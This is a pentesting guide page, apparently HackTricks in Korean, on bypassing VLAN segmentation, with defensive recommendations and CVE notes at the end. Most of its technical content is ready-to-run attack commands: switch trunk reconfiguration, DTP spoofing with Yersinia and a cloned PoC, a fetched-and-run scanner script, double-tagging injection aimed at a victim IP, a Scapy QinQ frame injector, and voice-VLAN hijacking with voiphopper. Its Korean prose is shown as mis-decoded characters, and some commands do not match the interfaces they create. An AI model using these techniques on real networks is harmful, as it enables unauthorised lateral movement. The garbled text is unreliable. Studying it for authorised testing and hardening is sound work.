Lateral VLAN Segmentation Bypass

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

์Šค์œ„์น˜์— ์ง์ ‘ ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๋Š” ๊ฒฝ์šฐ, VLAN ์„ธ๋ถ„ํ™”๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋Š” ์—ฐ๊ฒฐ๋œ ํฌํŠธ๋ฅผ ํŠธ๋ ํฌ ๋ชจ๋“œ๋กœ ์žฌ๊ตฌ์„ฑํ•˜๊ณ , ๋Œ€์ƒ VLAN์„ ์œ„ํ•œ ๊ฐ€์ƒ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์„ค์ •ํ•˜๋ฉฐ, ์‹œ๋‚˜๋ฆฌ์˜ค์— ๋”ฐ๋ผ ๋™์ ์œผ๋กœ(DHCP) ๋˜๋Š” ์ •์ ์œผ๋กœ IP ์ฃผ์†Œ๋ฅผ ์„ค์ •ํ•˜๋Š” ๊ฒƒ์„ ํฌํ•จํ•ฉ๋‹ˆ๋‹ค (์ž์„ธํ•œ ๋‚ด์šฉ์€ https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9 ํ™•์ธํ•˜์„ธ์š”.)

๋จผ์ €, ํŠน์ • ์—ฐ๊ฒฐ๋œ ํฌํŠธ๋ฅผ ์‹๋ณ„ํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Š” ์ผ๋ฐ˜์ ์œผ๋กœ CDP ๋ฉ”์‹œ์ง€๋ฅผ ํ†ตํ•ด ์ˆ˜ํ–‰๋˜๊ฑฐ๋‚˜ include ๋งˆ์Šคํฌ๋ฅผ ํ†ตํ•ด ํฌํŠธ๋ฅผ ๊ฒ€์ƒ‰ํ•˜์—ฌ ์ˆ˜ํ–‰ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

CDP๊ฐ€ ์ž‘๋™ํ•˜์ง€ ์•Š๋Š” ๊ฒฝ์šฐ, MAC ์ฃผ์†Œ๋ฅผ ๊ฒ€์ƒ‰ํ•˜์—ฌ ํฌํŠธ ์‹๋ณ„์„ ์‹œ๋„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

SW1(config)# show mac address-table | include 0050.0000.0500

ํŠธ๋ ํฌ ๋ชจ๋“œ๋กœ ์ „ํ™˜ํ•˜๊ธฐ ์ „์— ๊ธฐ์กด VLAN ๋ชฉ๋ก์„ ์ž‘์„ฑํ•˜๊ณ  ํ•ด๋‹น ์‹๋ณ„์ž๋ฅผ ํ™•์ธํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ด๋Ÿฌํ•œ ์‹๋ณ„์ž๋Š” ์ธํ„ฐํŽ˜์ด์Šค์— ํ• ๋‹น๋˜์–ด ํŠธ๋ ํฌ๋ฅผ ํ†ตํ•ด ๋‹ค์–‘ํ•œ VLAN์— ์ ‘๊ทผํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ฉ๋‹ˆ๋‹ค. ์‚ฌ์šฉ ์ค‘์ธ ํฌํŠธ๋Š” ์˜ˆ๋ฅผ ๋“ค์–ด VLAN 10๊ณผ ์—ฐ๊ฒฐ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

SW1# show vlan brief

ํŠธ๋ ํฌ ๋ชจ๋“œ๋กœ ์ „ํ™˜ํ•˜๋ ค๋ฉด ์ธํ„ฐํŽ˜์ด์Šค ๊ตฌ์„ฑ ๋ชจ๋“œ์— ๋“ค์–ด๊ฐ€์•ผ ํ•ฉ๋‹ˆ๋‹ค:

SW1(config)# interface GigabitEthernet 0/2
SW1(config-if)# switchport trunk encapsulation dot1q
SW1(config-if)# switchport mode trunk

ํŠธ๋ ํฌ ๋ชจ๋“œ๋กœ ์ „ํ™˜ํ•˜๋ฉด ์ผ์‹œ์ ์œผ๋กœ ์—ฐ๊ฒฐ์ด ์ค‘๋‹จ๋˜์ง€๋งŒ, ์ดํ›„์— ๋ณต๊ตฌํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ทธ๋Ÿฐ ๋‹ค์Œ ๊ฐ€์ƒ ์ธํ„ฐํŽ˜์ด์Šค๊ฐ€ ์ƒ์„ฑ๋˜๊ณ , VLAN ID๊ฐ€ ํ• ๋‹น๋˜๋ฉฐ, ํ™œ์„ฑํ™”๋ฉ๋‹ˆ๋‹ค:

# Legacy (vconfig) โ€“ still works but deprecated in modern kernels
sudo vconfig add eth0 10
sudo vconfig add eth0 20
sudo vconfig add eth0 50
sudo vconfig add eth0 60
sudo ifconfig eth0.10 up
sudo ifconfig eth0.20 up
sudo ifconfig eth0.50 up
sudo ifconfig eth0.60 up

# Modern (ip-link โ€“ preferred)
sudo modprobe 8021q
sudo ip link add link eth0 name eth0.10 type vlan id 10
sudo ip link add link eth0 name eth0.20 type vlan id 20
sudo ip link set eth0.10 up
sudo ip link set eth0.20 up
sudo dhclient -v eth0.50
sudo dhclient -v eth0.60

๊ทธ ํ›„, DHCP๋ฅผ ํ†ตํ•ด ์ฃผ์†Œ ์š”์ฒญ์ด ์ด๋ฃจ์–ด์ง‘๋‹ˆ๋‹ค. ๋˜๋Š” DHCP๊ฐ€ ๋ถˆ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ, ์ฃผ์†Œ๋ฅผ ์ˆ˜๋™์œผ๋กœ ๊ตฌ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

sudo dhclient -v eth0.10
sudo dhclient -v eth0.20

์ธํ„ฐํŽ˜์ด์Šค(VLAN 10)์—์„œ ์ •์  IP ์ฃผ์†Œ๋ฅผ ์ˆ˜๋™์œผ๋กœ ์„ค์ •ํ•˜๋Š” ์˜ˆ:

sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
# or
sudo ip addr add 10.10.10.66/24 dev eth0.10

์—ฐ๊ฒฐ์„ฑ์€ VLAN 10, 20, 50 ๋ฐ 60์˜ ๊ธฐ๋ณธ ๊ฒŒ์ดํŠธ์›จ์ด์— ICMP ์š”์ฒญ์„ ์‹œ์ž‘ํ•˜์—ฌ ํ…Œ์ŠคํŠธ๋ฉ๋‹ˆ๋‹ค.

๊ถ๊ทน์ ์œผ๋กœ ์ด ํ”„๋กœ์„ธ์Šค๋Š” VLAN ์„ธ๋ถ„ํ™”๋ฅผ ์šฐํšŒํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•˜์—ฌ ๋ชจ๋“  VLAN ๋„คํŠธ์›Œํฌ์— ๋Œ€ํ•œ ์ œํ•œ ์—†๋Š” ์•ก์„ธ์Šค๋ฅผ ์šฉ์ดํ•˜๊ฒŒ ํ•˜๊ณ , ํ›„์† ์ž‘์—…์„ ์œ„ํ•œ ๊ธฐ๋ฐ˜์„ ๋งˆ๋ จํ•ฉ๋‹ˆ๋‹ค.


๊ธฐํƒ€ VLAN-ํ˜ธํ•‘ ๊ธฐ์ˆ  (ํŠน๊ถŒ ์Šค์œ„์น˜ CLI ์—†์Œ)

์ด์ „ ๋ฐฉ๋ฒ•์€ ์Šค์œ„์น˜์— ๋Œ€ํ•œ ์ธ์ฆ๋œ ์ฝ˜์†” ๋˜๋Š” Telnet/SSH ์•ก์„ธ์Šค๋ฅผ ๊ฐ€์ •ํ•ฉ๋‹ˆ๋‹ค. ์‹ค์ œ ์ƒํ™ฉ์—์„œ ๊ณต๊ฒฉ์ž๋Š” ์ผ๋ฐ˜ ์•ก์„ธ์Šค ํฌํŠธ์— ์—ฐ๊ฒฐ๋˜์–ด ์žˆ๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์Šต๋‹ˆ๋‹ค. ๋‹ค์Œ Layer-2 ํŠธ๋ฆญ์€ ์Šค์œ„์น˜ OS์— ๋กœ๊ทธ์ธํ•˜์ง€ ์•Š๊ณ ๋„ ์ˆ˜ํ‰์œผ๋กœ ์ด๋™ํ•  ์ˆ˜ ์žˆ๊ฒŒ ํ•ด์ค๋‹ˆ๋‹ค:

1. ๋™์  ํŠธ๋ ํ‚น ํ”„๋กœํ† ์ฝœ(DTP)์„ ์ด์šฉํ•œ ์Šค์œ„์น˜ ์Šคํ‘ธํ•‘

DTP๊ฐ€ ํ™œ์„ฑํ™”๋œ Cisco ์Šค์œ„์น˜๋Š” ํ”ผ์–ด๊ฐ€ ์Šค์œ„์น˜๋ผ๊ณ  ์ฃผ์žฅํ•˜๋ฉด ๊ธฐ๊บผ์ด ํŠธ๋ ํฌ๋ฅผ ํ˜‘์ƒํ•ฉ๋‹ˆ๋‹ค. ๋‹จ์ผ DTP โ€œdesirableโ€ ๋˜๋Š” โ€œtrunkโ€ ํ”„๋ ˆ์ž„์„ ์ž‘์„ฑํ•˜๋ฉด ์•ก์„ธ์Šค ํฌํŠธ๊ฐ€ ๋ชจ๋“  ํ—ˆ์šฉ๋œ VLAN์„ ์ „์†กํ•˜๋Š” 802.1Q ํŠธ๋ ํฌ๋กœ ๋ณ€ํ™˜๋ฉ๋‹ˆ๋‹ค.

Yersinia ๋ฐ ์—ฌ๋Ÿฌ PoC๊ฐ€ ์ด ํ”„๋กœ์„ธ์Šค๋ฅผ ์ž๋™ํ™”ํ•ฉ๋‹ˆ๋‹ค:

# Become a trunk using Yersinia (GUI)
sudo yersinia -G          # Launch GUI โ†’ Launch attack โ†’ DTP โ†’ enabling trunking

# Python PoC (dtp-spoof)
git clone https://github.com/fleetcaptain/dtp-spoof.git
sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable

Recon helper (ํฌํŠธ์˜ DTP ์ƒํƒœ๋ฅผ ์ˆ˜๋™์œผ๋กœ ์ง€๋ฌธ ์ธ์‹ํ•˜๊ธฐ):

sudo modprobe 8021q
sudo ip link add link eth0 name eth0.30 type vlan id 30
sudo ip addr add 10.10.30.66/24 dev eth0.30
sudo ip link set eth0.30 up

# or

wget https://gist.githubusercontent.com/mgeeky/3f678d385984ba0377299a844fb793fa/raw/dtpscan.py
sudo python3 dtpscan.py -i eth0

ํฌํŠธ๊ฐ€ ํŠธ๋ ํฌ๋กœ ์ „ํ™˜๋˜๋ฉด 802.1Q ์„œ๋ธŒ ์ธํ„ฐํŽ˜์ด์Šค๋ฅผ ์ƒ์„ฑํ•˜๊ณ  ์ด์ „ ์„น์…˜์— ํ‘œ์‹œ๋œ ๋Œ€๋กœ ์ •ํ™•ํžˆ ํ”ผ๋ฒ—ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

2. ๋”๋ธ” ํƒœ๊น… (๋„ค์ดํ‹ฐ๋ธŒ VLAN ๋‚จ์šฉ)

๊ณต๊ฒฉ์ž๊ฐ€ ๋„ค์ดํ‹ฐ๋ธŒ(์–ธํƒœ๊ทธ) VLAN์— ์žˆ์„ ๊ฒฝ์šฐ, ๋‘ ๊ฐœ์˜ 802.1Q ํ—ค๋”๊ฐ€ ์žˆ๋Š” ์กฐ์ž‘๋œ ํ”„๋ ˆ์ž„์ด ํฌํŠธ๊ฐ€ ์•ก์„ธ์Šค ๋ชจ๋“œ๋กœ ์ž ๊ฒจ ์žˆ์–ด๋„ ๋‘ ๋ฒˆ์งธ VLAN์œผ๋กœ ์ด๋™ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. VLANPWN DoubleTagging.py(2022-2025 ๋ฆฌํ”„๋ ˆ์‹œ)์™€ ๊ฐ™์€ ๋„๊ตฌ๋Š” ์ฃผ์ž…์„ ์ž๋™ํ™”ํ•ฉ๋‹ˆ๋‹ค:

python3 DoubleTagging.py \
--interface eth0 \
--nativevlan 1 \
--targetvlan 20 \
--victim 10.10.20.24 \
--attacker 10.10.1.54

3. QinQ (802.1ad) ์Šคํƒœํ‚น

๋งŽ์€ ๊ธฐ์—… ์ฝ”์–ด๋Š” Q-in-Q ์„œ๋น„์Šค ์ œ๊ณต์ž ์บก์Аํ™”๋ฅผ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค. ํ—ˆ์šฉ๋˜๋Š” ๊ฒฝ์šฐ, ๊ณต๊ฒฉ์ž๋Š” ๊ณต๊ธ‰์ž(S-tag) ๋‚ด์—์„œ ์ž„์˜์˜ 802.1Q ํƒœ๊ทธ๊ฐ€ ์žˆ๋Š” ํŠธ๋ž˜ํ”ฝ์„ ํ„ฐ๋„๋งํ•˜์—ฌ ๋ณด์•ˆ ๊ตฌ์—ญ์„ ๋„˜์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ethertype 0x88a8์„ ์บก์ฒ˜ํ•˜๊ณ  Scapy๋กœ ์™ธ๋ถ€ ํƒœ๊ทธ๋ฅผ ํŒํ•ด ๋ณด์‹ญ์‹œ์˜ค:

from scapy.all import *
outer = 100      # Service tag
inner = 30       # Customer / target VLAN
payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
frame = Dot1Q(type=0x88a8, vlan=outer)/payload
sendp(frame, iface="eth0")

4. Voice-VLAN Hijacking via LLDP/CDP (IP-Phone Spoofing)

๊ธฐ์—… ์•ก์„ธ์Šค ํฌํŠธ๋Š” ์ข…์ข… โ€œaccess + voiceโ€ ๊ตฌ์„ฑ์— ์œ„์น˜ํ•ฉ๋‹ˆ๋‹ค: ์›Œํฌ์Šคํ…Œ์ด์…˜์„ ์œ„ํ•œ ํƒœ๊ทธ๊ฐ€ ์—†๋Š” ๋ฐ์ดํ„ฐ VLAN๊ณผ CDP ๋˜๋Š” LLDP-MED๋ฅผ ํ†ตํ•ด ๊ด‘๊ณ ๋˜๋Š” ํƒœ๊ทธ๊ฐ€ ์žˆ๋Š” ์Œ์„ฑ VLAN. IP ์ „ํ™”๋ฅผ ๊ฐ€์žฅํ•จ์œผ๋กœ์จ ๊ณต๊ฒฉ์ž๋Š” VoIP VLAN์„ ์ž๋™์œผ๋กœ ๋ฐœ๊ฒฌํ•˜๊ณ  ์ด๋™ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹คโ€”DTP๊ฐ€ ๋น„ํ™œ์„ฑํ™”๋˜์–ด ์žˆ์„ ๋•Œ๋„ ๋งˆ์ฐฌ๊ฐ€์ง€์ž…๋‹ˆ๋‹ค.

VoIP Hopper (Kali 2025.2์— ํŒจํ‚ค์ง€๋จ)์€ CDP, DHCP ์˜ต์…˜ 176/242, ๋ฐ ์ „์ฒด LLDP-MED ์Šคํ‘ธํ•‘์„ ์ง€์›ํ•ฉ๋‹ˆ๋‹ค:

# One-shot discovery & hop
sudo voiphopper -i eth0 -f cisco-7940

# Interactive Assessment Mode (passive sniff โ†’ auto-hop when VVID learnt)
sudo voiphopper -i eth0 -z

# Result: new sub-interface eth0.<VVID> with a DHCP or static address inside the voice VLAN

์ด ๊ธฐ์ˆ ์€ ๋ฐ์ดํ„ฐ/์Œ์„ฑ ๋ถ„๋ฆฌ๋ฅผ ์šฐํšŒํ•˜๋ฉฐ 2025๋…„์—๋Š” ๋งŽ์€ ๋ชจ๋ธ์—์„œ LLDP ์ž๋™ ์ •์ฑ…์ด ๊ธฐ๋ณธ์ ์œผ๋กœ ํ™œ์„ฑํ™”๋˜์–ด ์žˆ๊ธฐ ๋•Œ๋ฌธ์— ๊ธฐ์—… ์—ฃ์ง€ ์Šค์œ„์น˜์—์„œ ๋งค์šฐ ์ผ๋ฐ˜์ ์ž…๋‹ˆ๋‹ค.


๋ฐฉ์–ด ๊ถŒ์žฅ ์‚ฌํ•ญ

  1. ๋ชจ๋“  ์‚ฌ์šฉ์ž-facing ํฌํŠธ์—์„œ DTP ๋น„ํ™œ์„ฑํ™”: switchport mode access + switchport nonegotiate.
  2. ๋ชจ๋“  ํŠธ๋ ํฌ์˜ ๊ธฐ๋ณธ VLAN์„ ์‚ฌ์šฉ๋˜์ง€ ์•Š๋Š” ๋ธ”๋ž™ํ™€ VLAN์œผ๋กœ ๋ณ€๊ฒฝํ•˜๊ณ  ํƒœ๊ทธ ์ง€์ •: vlan dot1q tag native.
  3. ํŠธ๋ ํฌ์—์„œ ๋ถˆํ•„์š”ํ•œ VLAN ์ œ๊ฑฐ: switchport trunk allowed vlan 10,20.
  4. ํฌํŠธ ๋ณด์•ˆ, DHCP ์Šค๋ˆ„ํ•‘, ๋™์  ARP ๊ฒ€์‚ฌ ๋ฐ 802.1X๋ฅผ ์ ์šฉํ•˜์—ฌ ์•…์„ฑ Layer-2 ํ™œ๋™์„ ์ œํ•œํ•ฉ๋‹ˆ๋‹ค.
  5. IP ์ „ํ™” ์Šคํ‘ธํ•‘์ด ํ•„์š”ํ•˜์ง€ ์•Š์€ ๊ฒฝ์šฐ LLDP-MED ์ž๋™ ์Œ์„ฑ ์ •์ฑ…์„ ๋น„ํ™œ์„ฑํ™”(๋˜๋Š” ์ธ์ฆ๋œ MAC OUI์— ์ž ๊ธˆ)ํ•ฉ๋‹ˆ๋‹ค.
  6. 802.1Q ๋ถ„๋ฆฌ์—๋งŒ ์˜์กดํ•˜๊ธฐ๋ณด๋‹ค๋Š” ๊ฐœ์ธ VLAN ๋˜๋Š” L3 ์„ธ๋ถ„ํ™”๋ฅผ ์„ ํ˜ธํ•ฉ๋‹ˆ๋‹ค.

์‹ค์ œ ๋ฒค๋” ์ทจ์•ฝ์  (2022-2024)

์™„๋ฒฝํ•˜๊ฒŒ ๊ฐ•ํ™”๋œ ์Šค์œ„์น˜ ๊ตฌ์„ฑ๋„ ํŽŒ์›จ์–ด ๋ฒ„๊ทธ์— ์˜ํ•ด ์ €ํ•ด๋  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์ตœ๊ทผ ์‚ฌ๋ก€๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์Šต๋‹ˆ๋‹ค:

  • CVE-2022-20728โ€  โ€“ Cisco Aironet/Catalyst ์•ก์„ธ์Šค ํฌ์ธํŠธ๋Š” ๊ธฐ๋ณธ VLAN์—์„œ ๋น„๊ธฐ๋ณธ WLAN VLAN์œผ๋กœ์˜ ์ฃผ์ž…์„ ํ—ˆ์šฉํ•˜์—ฌ ์œ ์„ /๋ฌด์„  ๋ถ„๋ฆฌ๋ฅผ ์šฐํšŒํ•ฉ๋‹ˆ๋‹ค.
  • **CVE-2024-20465 (Cisco IOS Industrial Ethernet)**๋Š” Resilient Ethernet Protocol์„ ์ „ํ™˜ํ•œ ํ›„ SVI์—์„œ ACL ์šฐํšŒ๋ฅผ ํ—ˆ์šฉํ•˜์—ฌ VRF/VLAN ๊ฐ„์˜ ํŠธ๋ž˜ํ”ฝ์„ ์œ ์ถœํ•ฉ๋‹ˆ๋‹ค. ํŒจ์น˜ 17.9.5 ์ด์ƒ.

ํ•ญ์ƒ VLAN ๊ด€๋ จ ์šฐํšŒ/ACL ๋ฌธ์ œ์— ๋Œ€ํ•œ ๋ฒค๋” ๊ถŒ๊ณ  ์‚ฌํ•ญ์„ ๋ชจ๋‹ˆํ„ฐ๋งํ•˜๊ณ  ์ธํ”„๋ผ ์ด๋ฏธ์ง€๋ฅผ ์ตœ์‹  ์ƒํƒœ๋กœ ์œ ์ง€ํ•˜์‹ญ์‹œ์˜ค.


์ฐธ๊ณ  ๋ฌธํ—Œ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ